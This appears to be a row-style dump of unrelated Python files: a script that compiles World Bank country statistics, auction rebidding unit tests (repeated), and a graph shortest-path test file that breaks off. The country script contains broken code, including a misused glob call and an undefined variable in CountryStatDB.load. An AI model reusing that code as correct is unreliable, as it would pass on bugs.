if o.countries:
codes = o.countries
elif o.mask_file:
with nc.Dataset(os.path.join(o.mask_file)) as ds:
codes = [v[2:] for v in ds.variables if v.startswith('m_')]
elif o.folder:
for root, codes, _ in os.walk(country_data_path):
break
else:
v = stats_variables[0]
codes = sorted(set(c for c, y in v.wdi.index))
countries = {}
for code in codes:
wbcode = 'WLD' if code == 'world' else code
if wbcode in wbcountries.index:
name = wbcountries.loc[wbcode]['name']
else:
logging.warning('{} not present in World Bank Database'.format(code))
logging.info('try countrymasks.nc')
try:
with nc.Dataset(os.path.join(countrymasks, 'countrymasks.nc')) as ds:
name = ds['m_'+code].long_name
except:
logging.warning('{} not present in countrymasks.nc'.format(code))
logging.warning('skip {}'.format(code))
continue
stats = [v.to_dict(v.get(wbcode)) for v in stats_variables]
countries[code] = CountryStats(name, code=code, type='country', sub_countries=[], stats=stats)
db = CountryStatDB(countries)
db.save()
if __name__ == '__main__':
main() | create_country_data.py | import json, glob, os
import logging
import pandas as pd
import world_bank_data as wb
import netCDF4 as nc
countrymasks = os.path.dirname(__file__)
country_data_path = os.path.join(countrymasks, 'country_data')
datasets = os.path.join(countrymasks, 'datasets')
class Variable:
def __init__(self, type, label, unit, wdi_code=None, un_code=None, alias=None, wdi_scale=1):
self.type = type
self.label = label
self.alias = alias or type.lower()
self.unit = unit
self.wdi_code = wdi_code
self.wdi_scale = wdi_scale
self.un_code = un_code
self._wdi = None
self._un = None
def load_wdi(self):
if not self.wdi_code:
raise ValueError('{}: no associated WDI variable'.format(self.label))
fname = os.path.join(datasets, 'wdi', self.wdi_code+'.csv')
try:
timeseries = pd.read_csv(fname, index_col=('Country','Year'))[self.wdi_code]
except:
# NOTE: mrv=1 for most recent value would be equivalent to subsequent treatment
# ....: except that sometimes it results to NaN (e.g CO2 emissions for PSE, Palestine)
timeseries = wb.get_series(self.wdi_code, id_or_value='id', simplify_index=True)
timeseries.to_csv(fname)
return timeseries
# lazy loading
@property
def wdi(self):
if self._wdi is None:
self._wdi = self.load_wdi()
return self._wdi
@property
def un(self):
if not self.un_code:
raise ValueError('{}: no associated UN variable'.format(self.label))
if self._un is None:
self._un = json.load(os.path.join(datasets, 'countryprofiledata.json'))
return self._un
def get_wdi(self, country_code):
try:
value = self.wdi.loc[country_code].dropna().values[-1]*self.wdi_scale
except:
value = float('nan')
logging.warning('no valid WDI value for {},{}'.format(country_code, self.wdi_code))
return value
def get_un(self, country_code):
try:
return self.un[country_code][self.un_code]
except:
logging.warning('no valid UN value for {},{}'.format(country_code, self.un_code))
return float('nan')
def get(self, country_code):
if self.wdi_code:
return self.get_wdi(country_code)
elif self.un_code:
return self.get_un(country_code)
raise ValueError('no method provided')
def to_dict(self, value, rank=None):
return {
'type': self.type,
'label': self.label,
'unit': self.unit,
'value': value,
'rank': rank,
'un_code': self.un_code,
'wdi_code': self.wdi_code,
}
# https://data.worldbank.org/indicator/AG.SRF.TOTL.K2
# AG.LND.TOTL.K2 : land area !
stats_variables = [
Variable('POP_TOTL', label='Total population', unit='million people', alias='pop_total', wdi_code='SP.POP.TOTL', wdi_scale=1e-6),
Variable('POP_DNST', label='Population density', unit='people/sq. km', alias='pop_density', wdi_code='EN.POP.DNST'),
Variable('RUR_POP_PRCT', label='Rural population', unit='% of total population', alias='pop_rural', wdi_code='SP.RUR.TOTL.ZS'),
Variable('URB_POP_PRCT', label='Urban population', unit='% of total population', alias='pop_urban', wdi_code='SP.URB.TOTL.IN.ZS'),
Variable('POP_GROWTH', label='Population growth', unit='% per year', alias='pop_growth', wdi_code='SP.POP.GROW'),
Variable('SURFACE_AREA', label='Surface area', unit='sq. km', alias='area', wdi_code='AG.SRF.TOTL.K2'),
Variable('GDP_PPP', label='Gross Domestic Product, PPP', unit='billion $ (PPP, current)', alias='gdp_ppp', wdi_code='NY.GDP.MKTP.PP.CD', wdi_scale=1e-9),
Variable('GDP_PER_CAPITA_PPP', label='GDP per capita, PPP', unit='$ (PPP, current)', alias='gdp_capita_ppp', wdi_code='NY.GDP.PCAP.PP.CD'),
Variable('GDP', label='Gross Domestic Product', unit='billion $ (current)', alias='gdp', wdi_code='NY.GDP.MKTP.CD', wdi_scale=1e-9),
Variable('GDP_PER_CAPITA', label='GDP per capita', unit='$ (current)', alias='gdp_capita', wdi_code='NY.GDP.PCAP.CD'),
Variable('GDP_GROWTH', label='GDP growth', unit='annual %', alias='gdp_growth', wdi_code='NY.GDP.MKTP.KD.ZG'),
Variable('POV_DDAY', label='Poverty headcount rank at $ 1.90 a day (2011 PPP)', unit='% of total population', alias='poverty', wdi_code='SI.POV.DDAY'),
# Variable('CO2_EM_CAPITA', label='CO2 emissions per capita', unit='metric tons/capita', alias='co2_capita', wdi_code='EM.ATM.CO2E.PC'),
Variable('CO2_EM', label='CO2 emissions', unit='kt', alias='co2', wdi_code='EN.ATM.CO2E.KT'),
Variable('CO2_EM_INTENSITY', label='CO2 intensity', unit='kg per kg of oil equivalent energy use', wdi_code='EN.ATM.CO2E.EG.ZS'),
Variable('CO2_EM_GDP', label='CO2 emissions per GDP', unit='kg per 2011 PPP $ of GDP', wdi_code='EN.ATM.CO2E.PP.GD.KD'),
Variable('HDI', label='Human Development Index', unit='(-)', un_code='HDI_Human_development_index_HDIg_value'),
]
class CountryStats:
"""This is the class for the corresponding json file in country_data
"""
def __init__(self, name, type="country", sub_countries=[], code=None, stats=None):
self.name = name
self.type = type
self.code = code
self.sub_countries = sub_countries
self.stats = stats or []
def get(self, name, insert=False):
try:
i = [e['type'] for e in self.stats].index(name)
return self.stats[i]
except ValueError:
if insert:
e = {'type': name}
self.stats.append(e)
return e
else:
raise
def getvalue(self, name, missing=float('nan')):
try:
return self.get(name)['value']
except ValueError:
return missing
@classmethod
def load(cls, fname):
js = json.load(open(fname))
code = os.path.basename(os.path.dirname(fname))
return cls(js['name'], js.get('type', 'country'), js.get('sub-countries',[]), code=js.get('code', code), stats=js.get('stats', []))
def save(self, fname):
cdir = os.path.dirname(fname)
if not os.path.exists(cdir):
logging.info('create '+repr(cdir))
os.makedirs(cdir)
js = {
'name': self.name,
'code': self.code,
'type': self.type,
'sub-countries': self.sub_countries,
'stats': self.stats,
}
json.dump(js, open(fname, 'w'))
def __repr__(self):
return 'CountryStats({name}, {code})'.format(**vars(self))
class CountryStatDB:
def __init__(self, countries=None):
self.countries = countries or {}
@staticmethod
def cpath(code):
return os.path.join(country_data_path, code, '{}_general.json'.format(code))
@classmethod
def load(cls):
db = cls()
for root, codes, _ in glob.glob(country_data_path):
break
for c in codes:
cpath = os.path.join(country_data_path, c, '{}_general.json'.format(c))
try:
cstat = CountryStats.load(cpath)
except Exception as error:
logging.warning(str(error))
continue
db.countries[c] = stat
return db
def save(self):
for c, cstat in self.countries.items():
cpath = self.cpath(c)
cstat.save(cpath)
def main():
import argparse
parser = argparse.ArgumentParser()
x = parser.add_mutually_exclusive_group()
x.add_argument('--countries', nargs='+')
x.add_argument('--folder', action='store_true', help='read country codes from country_data folder')
# x.add_argument('--netcdf', '--nc', action='store_true', help='read country codes from default countrymasks.nc')
x.add_argument('--mask-file', help='read country code from netcdf mask file')
# x.add_argument('--shape-file', help='read country code from geojson shape file')
o = parser.parse_args()
wbcountries = wb.get_countries()
if o.countries:
codes = o.countries
elif o.mask_file:
with nc.Dataset(os.path.join(o.mask_file)) as ds:
codes = [v[2:] for v in ds.variables if v.startswith('m_')]
elif o.folder:
for root, codes, _ in os.walk(country_data_path):
break
else:
v = stats_variables[0]
codes = sorted(set(c for c, y in v.wdi.index))
countries = {}
for code in codes:
wbcode = 'WLD' if code == 'world' else code
if wbcode in wbcountries.index:
name = wbcountries.loc[wbcode]['name']
else:
logging.warning('{} not present in World Bank Database'.format(code))
logging.info('try countrymasks.nc')
try:
with nc.Dataset(os.path.join(countrymasks, 'countrymasks.nc')) as ds:
name = ds['m_'+code].long_name
except:
logging.warning('{} not present in countrymasks.nc'.format(code))
logging.warning('skip {}'.format(code))
continue
stats = [v.to_dict(v.get(wbcode)) for v in stats_variables]
countries[code] = CountryStats(name, code=code, type='country', sub_countries=[], stats=stats)
db = CountryStatDB(countries)
db.save()
if __name__ == '__main__':
main() | 0.484136 | 0.189371 |
import os
import numpy as np
from numpy.testing import TestCase, assert_array_almost_equal, \
assert_almost_equal
from parameterized import parameterized
from ..rebidding import (
MultistageAuctionData, MultistageIsNonCompetitive,
RefinedMultistageData, RefinedMultistageIsNonCompetitive,
RefinedMultistageEnvironment, refined_moment_matrix,
RefinedMultistageSolver, IteratedRefinedMultistageSolver,
ParallelRefinedMultistageSolver, EfficientMultistageIsNonCompetitive)
from ..auction_data import _read_bids, FilterTies
from ..environments import MarkupConstraint
from .test_analytics import is_distribution
def _load_multistage_data():
path = os.path.join(
os.path.dirname(__file__), 'reference_data', 'tsuchiura_data.csv')
raw_data = _read_bids(path)
raw_data['reserveprice'] *= .985
raw_data['norm_bid'] = raw_data['bid'] / raw_data['reserveprice']
return raw_data
class TestMultistageAuctionData(TestCase):
def setUp(self) -> None:
self.auctions = MultistageAuctionData(_load_multistage_data())
def test_second_round(self):
assert_almost_equal(
self.auctions.share_second_round, 0.11912865)
def test_raise_error(self):
self.assertRaises(NotImplementedError,
self.auctions.get_share_marginal,
self.auctions.df_bids, .1)
def test_share_marginal(self):
assert_almost_equal(
self.auctions.get_share_marginal(
self.auctions.df_bids, -.02), 0.08492171)
def test_share_marginal_cont(self):
assert_almost_equal(
self.auctions.share_marginal_cont(self.auctions.df_bids, -.02),
0.08492171)
def test_share_marginal_info(self):
assert_almost_equal(
self.auctions.share_marginal_info(self.auctions.df_bids, -.01),
0.0238257)
def test_get_counterfactual_demand(self):
assert_array_almost_equal(
[self.auctions.get_counterfactual_demand(r) for r in [-.05, .05]],
[0.775868, 0.02067733151])
class TestRefinedMultistageData(TestCase):
def setUp(self) -> None:
self.data = RefinedMultistageData(_load_multistage_data())
@parameterized.expand((
[-.01, [0.4954901, 0.0597345, 0.0238257]],
[.01, 0.10534377127297481]
))
def test_get_counterfactual_demand(self, rho, expected):
assert_almost_equal(
self.data.get_counterfactual_demand(rho), expected
)
def test_assemble_target_moments(self):
assert_array_almost_equal(
self.data.assemble_target_moments([-.01, 0, .005]),
[0.49549, 0.059735, 0.023826, 0.25017, 0.18065])
assert_array_almost_equal(
self.data.assemble_target_moments(
[-.01, 0, .005], self.data.df_bids),
[0.49549, 0.059735, 0.023826, 0.25017, 0.18065])
def test_filter(self):
filter_ties = FilterTies(.0001)
assert np.sum(filter_ties.get_ties(self.data)) == 61
assert filter_ties(self.data).df_bids.shape == (5815, 7)
assert isinstance(filter_ties(self.data), RefinedMultistageData)
def test_bootstrap(self):
demand_sample = self.data.bootstrap_demand_sample([-.01, 0, .005], 3)
assert demand_sample.shape == (3, 5)
assert_array_almost_equal(
demand_sample.round(2),
[[0.5, 0.06, 0.02, 0.25, 0.17],
[0.49, 0.06, 0.02, 0.24, 0.18],
[0.49, 0.06, 0.02, 0.24, 0.17]]
)
class TestMultistageIsNonCompetitive(TestCase):
def setUp(self):
self.env = np.array([.5, .4, .3, .8])
@parameterized.expand([
[[-.03, .02], [[0.085, 0.08, 0.066], [-.0075]]],
[[-.02, .02], [[0.09, 0.08, 0.066], [-.005]]],
[[-.2, .0, .02], [[0., 0.08, 0.066], [-.05]]]
])
def test_payoff_penalty(self, deviations, expected):
MultistageIsNonCompetitive.max_win_prob = .75
metric = MultistageIsNonCompetitive(deviations)
assert_array_almost_equal(
metric._get_payoffs(self.env), expected[0])
assert_array_almost_equal(
metric._get_penalty(self.env), expected[1])
@parameterized.expand([
[[-.03, .02], 0],
[[-.02, .02], 1],
[[-.2, .0, .02], 0],
[[.01, .02], 0]
])
def test_ic(self, deviations, expected):
MultistageIsNonCompetitive.max_win_prob = .75
metric = MultistageIsNonCompetitive(deviations)
assert_array_almost_equal(metric(self.env), expected)
class TestRefinedMultistageIsNonCompetitive(TestCase):
def setUp(self):
self.env = np.array([.6, .1, .05, .3, .15, .95])
self.metric_type = RefinedMultistageIsNonCompetitive
@parameterized.expand([
[[-.01, .01], [0.018375, 0.015, 0.009]],
[[-.01, 0, .01], [0.018375, 0.015, 0.009]],
[[-.05, .02], [-0.003125, 0.015, 0.0105]],
[[-.05, .1], [-0.003125, 0.015, 0.0225]]
])
def test_payoffs(self, deviations, expected):
metric = self.metric_type(deviations)
assert_array_almost_equal(metric._get_payoffs(self.env), expected)
@parameterized.expand([
[[-.01, .01], 1],
[[-.01, 0, .01], 1],
[[-.05, .02], 0],
[[-.05, .1], 1]
])
def test_ic(self, deviations, expected):
metric = self.metric_type(deviations)
assert_array_almost_equal(metric(self.env), expected)
def test_raise_error(self):
self.assertRaises(
ValueError, self.metric_type, [-.1, -.01, 0, .1])
self.assertRaises(
ValueError, self.metric_type, [-.1, .01, 0, .1])
class TestEfficientMultistageIsNonCompetitive(TestCase):
@parameterized.expand([
[[-.02, 0, .001], [.6, .1, .1, .2, .199], [0.958, np.NAN, 0.801]],
[[-.02, 0, 1e-9], [.6, .1, .1, .2, .199], [0.958, np.NAN, 1]],
[[-1e-9, 0, .001], [.6, .1, .1, .2, .199], [0, np.NAN, .801]],
[[-.02, 0, .001], [.4, .1, .1, .2, .199], [0.87, np.NAN, .801]],
[[-.02, 0, .001], [.37, .1, .1, .2, .199], [0.705, np.NAN, .801]]
])
def test_penalized_payoff_bounds(self, deviations, beliefs, expected):
metric = EfficientMultistageIsNonCompetitive(deviations)
metric.min_markup, metric.max_markup = .02, .5
assert_array_almost_equal(metric._get_cost_bounds(beliefs), expected)
@parameterized.expand([
[[-.02, 0, .001], [.6, .1, .1, .2, .199, .5], 1],
[[-.02, 0, 1e-9], [.6, .1, .1, .2, .199, .5], 0],
[[-1e-9, 0, .001], [.6, .1, .1, .2, .199, .5], 0],
[[-.02, 0, .001], [.4, .1, .1, .2, .199, .5], 1],
[[-.02, 0, .001], [.37, .1, .1, .2, .199, .5], 0]
])
def test_is_non_competitive(self, deviations, env, expected):
metric = EfficientMultistageIsNonCompetitive(deviations)
metric.min_markup, metric.max_markup = .02, .5
assert metric(env) == expected
class TestRefinedMultistageEnvironment(TestCase):
def setUp(self):
self.env = RefinedMultistageEnvironment(num_actions=2)
def test_private_generate_raw_environments(self):
assert_array_almost_equal(
self.env._generate_raw_environments(3, 1).round(2),
[[0.72, 0.16, 0.06, 0.42, 0., 0.67],
[0.3, 0.07, 0.61, 0.15, 0.09, 0.42],
[0.4, 0.04, 0.02, 0.35, 0.19, 0.56]]
)
def test_refined_moment_matrix():
assert_array_almost_equal(
refined_moment_matrix(),
np.array([
[1, 0, 0, 0, 0],
[1, -1, 0, -1, 0],
[0, -1, 1, 0, 0],
[-1, 0, 0, 1, 0],
[0, 0, 0, -1, 1]
]))
assert_array_almost_equal(
refined_moment_matrix(False), np.identity(5))
class TestRefinedSolvers(TestCase):
def setUp(self) -> None:
filter_ties = FilterTies(.0001)
markup_constraint = MarkupConstraint(.5, .02)
self.data = filter_ties(RefinedMultistageData(_load_multistage_data()))
args = (self.data, [-.02, 0, .002],
RefinedMultistageIsNonCompetitive, [markup_constraint])
kwargs = dict(
num_points=1e3, seed=0, project=False,
filter_ties=filter_ties, moment_matrix=None, moment_weights=None,
confidence_level=.95)
self.solver = RefinedMultistageSolver(*args, **kwargs)
self.parallel_solver = ParallelRefinedMultistageSolver(*args, **kwargs)
kwargs['num_evaluations'] = 10
self.iter_solver = IteratedRefinedMultistageSolver(*args, **kwargs)
def test_moment_matrix(self):
assert_array_almost_equal(
self.solver._moment_matrix, refined_moment_matrix())
assert_array_almost_equal(
self.solver._moment_weights, 5 * [1])
def test_tolerance(self):
assert_almost_equal(
self.solver.tolerance, 0.0003502449)
def test_generate_env_perf(self):
assert_array_almost_equal(
self.solver._env_with_perf[:3].round(2),
[[0.83, 0.12, 0.06, 0.09, 0.02, 0.76, 1.],
[0.77, 0.04, 0.04, 0.46, 0.26, 0.85, 1.],
[0.62, 0.03, 0.08, 0.57, 0.02, 0.79, 0.]])
def test_demand(self):
assert_array_almost_equal(
self.solver.demands,
[0.693981, 0.085297, 0., 0.250559, 0.239123])
def test_solution(self):
assert_almost_equal(
self.solver.result.solution, 0.751241, decimal=5)
def test_argmin_distribution(self):
assert is_distribution(self.solver.result.argmin['prob'])
def test_argmin(self):
cols = ['prob'] + self.solver.argmin_columns
df = self.solver.result.argmin[cols]
assert_array_almost_equal(
df.iloc[:2],
[[0.2, 0.7, 0.1, 0., 0.3, 0.2, 0.9, 1.],
[0.2, 0.7, 0.1, 0., 0.3, 0.2, 0.8, 1.]], decimal=1)
def test_iter(self):
assert_almost_equal(
self.iter_solver.result.solution, 0.271439, decimal=5)
def test_iter_argmin(self):
cols = ['prob'] + self.iter_solver.solver.argmin_columns
df = self.iter_solver.result.argmin[cols]
assert_array_almost_equal(
df.iloc[:2],
[[.59, .51, .09, .025, .13, .086, .98, 0.],
[.27, 1.0, .065, 0, .3, .29, .86, 1.]], decimal=1)
def test_parallel_solution(self):
assert_almost_equal(self.parallel_solver.result.solution, 0.30190327) | mb_api/tests/test_rebidding.py | import os
import numpy as np
from numpy.testing import TestCase, assert_array_almost_equal, \
assert_almost_equal
from parameterized import parameterized
from ..rebidding import (
MultistageAuctionData, MultistageIsNonCompetitive,
RefinedMultistageData, RefinedMultistageIsNonCompetitive,
RefinedMultistageEnvironment, refined_moment_matrix,
RefinedMultistageSolver, IteratedRefinedMultistageSolver,
ParallelRefinedMultistageSolver, EfficientMultistageIsNonCompetitive)
from ..auction_data import _read_bids, FilterTies
from ..environments import MarkupConstraint
from .test_analytics import is_distribution
def _load_multistage_data():
path = os.path.join(
os.path.dirname(__file__), 'reference_data', 'tsuchiura_data.csv')
raw_data = _read_bids(path)
raw_data['reserveprice'] *= .985
raw_data['norm_bid'] = raw_data['bid'] / raw_data['reserveprice']
return raw_data
class TestMultistageAuctionData(TestCase):
def setUp(self) -> None:
self.auctions = MultistageAuctionData(_load_multistage_data())
def test_second_round(self):
assert_almost_equal(
self.auctions.share_second_round, 0.11912865)
def test_raise_error(self):
self.assertRaises(NotImplementedError,
self.auctions.get_share_marginal,
self.auctions.df_bids, .1)
def test_share_marginal(self):
assert_almost_equal(
self.auctions.get_share_marginal(
self.auctions.df_bids, -.02), 0.08492171)
def test_share_marginal_cont(self):
assert_almost_equal(
self.auctions.share_marginal_cont(self.auctions.df_bids, -.02),
0.08492171)
def test_share_marginal_info(self):
assert_almost_equal(
self.auctions.share_marginal_info(self.auctions.df_bids, -.01),
0.0238257)
def test_get_counterfactual_demand(self):
assert_array_almost_equal(
[self.auctions.get_counterfactual_demand(r) for r in [-.05, .05]],
[0.775868, 0.02067733151])
class TestRefinedMultistageData(TestCase):
def setUp(self) -> None:
self.data = RefinedMultistageData(_load_multistage_data())
@parameterized.expand((
[-.01, [0.4954901, 0.0597345, 0.0238257]],
[.01, 0.10534377127297481]
))
def test_get_counterfactual_demand(self, rho, expected):
assert_almost_equal(
self.data.get_counterfactual_demand(rho), expected
)
def test_assemble_target_moments(self):
assert_array_almost_equal(
self.data.assemble_target_moments([-.01, 0, .005]),
[0.49549, 0.059735, 0.023826, 0.25017, 0.18065])
assert_array_almost_equal(
self.data.assemble_target_moments(
[-.01, 0, .005], self.data.df_bids),
[0.49549, 0.059735, 0.023826, 0.25017, 0.18065])
def test_filter(self):
filter_ties = FilterTies(.0001)
assert np.sum(filter_ties.get_ties(self.data)) == 61
assert filter_ties(self.data).df_bids.shape == (5815, 7)
assert isinstance(filter_ties(self.data), RefinedMultistageData)
def test_bootstrap(self):
demand_sample = self.data.bootstrap_demand_sample([-.01, 0, .005], 3)
assert demand_sample.shape == (3, 5)
assert_array_almost_equal(
demand_sample.round(2),
[[0.5, 0.06, 0.02, 0.25, 0.17],
[0.49, 0.06, 0.02, 0.24, 0.18],
[0.49, 0.06, 0.02, 0.24, 0.17]]
)
class TestMultistageIsNonCompetitive(TestCase):
def setUp(self):
self.env = np.array([.5, .4, .3, .8])
@parameterized.expand([
[[-.03, .02], [[0.085, 0.08, 0.066], [-.0075]]],
[[-.02, .02], [[0.09, 0.08, 0.066], [-.005]]],
[[-.2, .0, .02], [[0., 0.08, 0.066], [-.05]]]
])
def test_payoff_penalty(self, deviations, expected):
MultistageIsNonCompetitive.max_win_prob = .75
metric = MultistageIsNonCompetitive(deviations)
assert_array_almost_equal(
metric._get_payoffs(self.env), expected[0])
assert_array_almost_equal(
metric._get_penalty(self.env), expected[1])
@parameterized.expand([
[[-.03, .02], 0],
[[-.02, .02], 1],
[[-.2, .0, .02], 0],
[[.01, .02], 0]
])
def test_ic(self, deviations, expected):
MultistageIsNonCompetitive.max_win_prob = .75
metric = MultistageIsNonCompetitive(deviations)
assert_array_almost_equal(metric(self.env), expected)
class TestRefinedMultistageIsNonCompetitive(TestCase):
def setUp(self):
self.env = np.array([.6, .1, .05, .3, .15, .95])
self.metric_type = RefinedMultistageIsNonCompetitive
@parameterized.expand([
[[-.01, .01], [0.018375, 0.015, 0.009]],
[[-.01, 0, .01], [0.018375, 0.015, 0.009]],
[[-.05, .02], [-0.003125, 0.015, 0.0105]],
[[-.05, .1], [-0.003125, 0.015, 0.0225]]
])
def test_payoffs(self, deviations, expected):
metric = self.metric_type(deviations)
assert_array_almost_equal(metric._get_payoffs(self.env), expected)
@parameterized.expand([
[[-.01, .01], 1],
[[-.01, 0, .01], 1],
[[-.05, .02], 0],
[[-.05, .1], 1]
])
def test_ic(self, deviations, expected):
metric = self.metric_type(deviations)
assert_array_almost_equal(metric(self.env), expected)
def test_raise_error(self):
self.assertRaises(
ValueError, self.metric_type, [-.1, -.01, 0, .1])
self.assertRaises(
ValueError, self.metric_type, [-.1, .01, 0, .1])
class TestEfficientMultistageIsNonCompetitive(TestCase):
@parameterized.expand([
[[-.02, 0, .001], [.6, .1, .1, .2, .199], [0.958, np.NAN, 0.801]],
[[-.02, 0, 1e-9], [.6, .1, .1, .2, .199], [0.958, np.NAN, 1]],
[[-1e-9, 0, .001], [.6, .1, .1, .2, .199], [0, np.NAN, .801]],
[[-.02, 0, .001], [.4, .1, .1, .2, .199], [0.87, np.NAN, .801]],
[[-.02, 0, .001], [.37, .1, .1, .2, .199], [0.705, np.NAN, .801]]
])
def test_penalized_payoff_bounds(self, deviations, beliefs, expected):
metric = EfficientMultistageIsNonCompetitive(deviations)
metric.min_markup, metric.max_markup = .02, .5
assert_array_almost_equal(metric._get_cost_bounds(beliefs), expected)
@parameterized.expand([
[[-.02, 0, .001], [.6, .1, .1, .2, .199, .5], 1],
[[-.02, 0, 1e-9], [.6, .1, .1, .2, .199, .5], 0],
[[-1e-9, 0, .001], [.6, .1, .1, .2, .199, .5], 0],
[[-.02, 0, .001], [.4, .1, .1, .2, .199, .5], 1],
[[-.02, 0, .001], [.37, .1, .1, .2, .199, .5], 0]
])
def test_is_non_competitive(self, deviations, env, expected):
metric = EfficientMultistageIsNonCompetitive(deviations)
metric.min_markup, metric.max_markup = .02, .5
assert metric(env) == expected
class TestRefinedMultistageEnvironment(TestCase):
def setUp(self):
self.env = RefinedMultistageEnvironment(num_actions=2)
def test_private_generate_raw_environments(self):
assert_array_almost_equal(
self.env._generate_raw_environments(3, 1).round(2),
[[0.72, 0.16, 0.06, 0.42, 0., 0.67],
[0.3, 0.07, 0.61, 0.15, 0.09, 0.42],
[0.4, 0.04, 0.02, 0.35, 0.19, 0.56]]
)
def test_refined_moment_matrix():
assert_array_almost_equal(
refined_moment_matrix(),
np.array([
[1, 0, 0, 0, 0],
[1, -1, 0, -1, 0],
[0, -1, 1, 0, 0],
[-1, 0, 0, 1, 0],
[0, 0, 0, -1, 1]
]))
assert_array_almost_equal(
refined_moment_matrix(False), np.identity(5))
class TestRefinedSolvers(TestCase):
def setUp(self) -> None:
filter_ties = FilterTies(.0001)
markup_constraint = MarkupConstraint(.5, .02)
self.data = filter_ties(RefinedMultistageData(_load_multistage_data()))
args = (self.data, [-.02, 0, .002],
RefinedMultistageIsNonCompetitive, [markup_constraint])
kwargs = dict(
num_points=1e3, seed=0, project=False,
filter_ties=filter_ties, moment_matrix=None, moment_weights=None,
confidence_level=.95)
self.solver = RefinedMultistageSolver(*args, **kwargs)
self.parallel_solver = ParallelRefinedMultistageSolver(*args, **kwargs)
kwargs['num_evaluations'] = 10
self.iter_solver = IteratedRefinedMultistageSolver(*args, **kwargs)
def test_moment_matrix(self):
assert_array_almost_equal(
self.solver._moment_matrix, refined_moment_matrix())
assert_array_almost_equal(
self.solver._moment_weights, 5 * [1])
def test_tolerance(self):
assert_almost_equal(
self.solver.tolerance, 0.0003502449)
def test_generate_env_perf(self):
assert_array_almost_equal(
self.solver._env_with_perf[:3].round(2),
[[0.83, 0.12, 0.06, 0.09, 0.02, 0.76, 1.],
[0.77, 0.04, 0.04, 0.46, 0.26, 0.85, 1.],
[0.62, 0.03, 0.08, 0.57, 0.02, 0.79, 0.]])
def test_demand(self):
assert_array_almost_equal(
self.solver.demands,
[0.693981, 0.085297, 0., 0.250559, 0.239123])
def test_solution(self):
assert_almost_equal(
self.solver.result.solution, 0.751241, decimal=5)
def test_argmin_distribution(self):
assert is_distribution(self.solver.result.argmin['prob'])
def test_argmin(self):
cols = ['prob'] + self.solver.argmin_columns
df = self.solver.result.argmin[cols]
assert_array_almost_equal(
df.iloc[:2],
[[0.2, 0.7, 0.1, 0., 0.3, 0.2, 0.9, 1.],
[0.2, 0.7, 0.1, 0., 0.3, 0.2, 0.8, 1.]], decimal=1)
def test_iter(self):
assert_almost_equal(
self.iter_solver.result.solution, 0.271439, decimal=5)
def test_iter_argmin(self):
cols = ['prob'] + self.iter_solver.solver.argmin_columns
df = self.iter_solver.result.argmin[cols]
assert_array_almost_equal(
df.iloc[:2],
[[.59, .51, .09, .025, .13, .086, .98, 0.],
[.27, 1.0, .065, 0, .3, .29, .86, 1.]], decimal=1)
def test_parallel_solution(self):
assert_almost_equal(self.parallel_solver.result.solution, 0.30190327) | 0.525856 | 0.591045 |
import unittest
from planet import *
class ExampleTestPlanet(unittest.TestCase):
def setUp(self):
# set your data structure
self.havok = Planet()
self.havok.add_path(((15, 37), Direction.NORTH),
((15, 39), Direction.SOUTH), 1)
# loop
self.havok.add_path(((15, 39), Direction.NORTH),
((15, 39), Direction.WEST), 1)
self.havok.add_path(((15, 39), Direction.EAST),
((16, 39), Direction.WEST), 1)
self.havok.add_path(((15, 37), Direction.WEST),
((14, 39), Direction.SOUTH), 1)
self.havok.add_path(((14, 39), Direction.WEST),
((13, 38), Direction.NORTH), 1)
self.havok.add_path(((13, 38), Direction.SOUTH),
((13, 37), Direction.NORTH), 1)
# blocked paths
self.havok.add_path(((15, 37), Direction.SOUTH),
((15, 37), Direction.SOUTH), -1)
self.havok.add_path(((16, 39), Direction.NORTH),
((16, 39), Direction.NORTH), -1)
self.havok.add_path(((17, 38), Direction.SOUTH),
((17, 37), Direction.NORTH), 1)
def test_empty_planet(self):
self.assertIsNotNone(self.havok.get_paths())
self.assertNotEqual(self.havok.get_paths(), {})
def test_target_not_reachable(self):
self.assertIsNone(self.havok.shortest_path((13, 37), (20, 38)))
self.assertIsNone(self.havok.shortest_path((13, 37), (17, 38)))
class shortestPathTestPlanet(unittest.TestCase):
def setUp(self):
# set your data structure
self.havok = Planet()
self.havok.add_path(((15, 37), Direction.NORTH),
((15, 39), Direction.SOUTH), 1)
self.havok.add_path(((15, 37), Direction.EAST),
((17, 37), Direction.WEST), 1)
# loop
self.havok.add_path(((15, 39), Direction.NORTH),
((15, 39), Direction.WEST), 1)
self.havok.add_path(((15, 39), Direction.EAST),
((16, 39), Direction.WEST), 1)
self.havok.add_path(((15, 37), Direction.WEST),
((14, 39), Direction.SOUTH), 1)
self.havok.add_path(((14, 39), Direction.WEST),
((13, 38), Direction.NORTH), 1)
self.havok.add_path(((13, 38), Direction.SOUTH),
((13, 37), Direction.NORTH), 1)
self.havok.add_path(((17, 38), Direction.SOUTH),
((17, 37), Direction.NORTH), 1)
# changed this weight to make dijkstra predictable
self.havok.add_path(((17, 38), Direction.EAST),
((17, 37), Direction.EAST), 2)
self.havok.add_path(((16, 39), Direction.EAST),
((17, 38), Direction.NORTH), 1)
self.havok.add_path(((16, 39), Direction.SOUTH),
((17, 38), Direction.WEST), 1)
# blocked paths
self.havok.add_path(((15, 37), Direction.SOUTH),
((15, 37), Direction.SOUTH), -1)
self.havok.add_path(((16, 39), Direction.NORTH),
((16, 39), Direction.NORTH), -1)
def test_shortest_path(self):
print("HI")
print(self.havok.shortest_path((17, 38), (17, 38)))
self.assertEqual(
self.havok.shortest_path((13, 37), (17, 38)),
[((13, 37), Direction.NORTH), ((13, 38), Direction.NORTH),
((14, 39), Direction.SOUTH), ((15, 37), Direction.EAST),
((17, 37), Direction.NORTH)])
class ExploringTestPlanet(unittest.TestCase):
def setUp(self):
self.havok = Planet()
self.havok.add_path(((15, 37), Direction.NORTH),
((15, 39), Direction.SOUTH), 1)
self.havok.add_path(((15, 37), Direction.EAST),
((17, 37), Direction.WEST), 1)
self.havok.add_path(((15, 39), Direction.NORTH),
((15, 39), Direction.WEST), 1)
self.havok.add_path(((15, 39), Direction.EAST),
((16, 39), Direction.WEST), 1)
self.havok.add_path(((16, 39), Direction.EAST),
((17, 38), Direction.NORTH), 1)
self.havok.add_path(((16, 39), Direction.SOUTH),
((17, 38), Direction.WEST), 1)
self.havok.add_path(((17, 38), Direction.SOUTH),
((17, 37), Direction.NORTH), 1)
self.havok.add_path(((17, 38), Direction.EAST),
((17, 37), Direction.EAST), 1)
self.havok.add_path(((15, 37), Direction.WEST),
((14, 39), Direction.SOUTH), 1)
self.havok.add_path(((14, 39), Direction.WEST),
((13, 38), Direction.NORTH), 1)
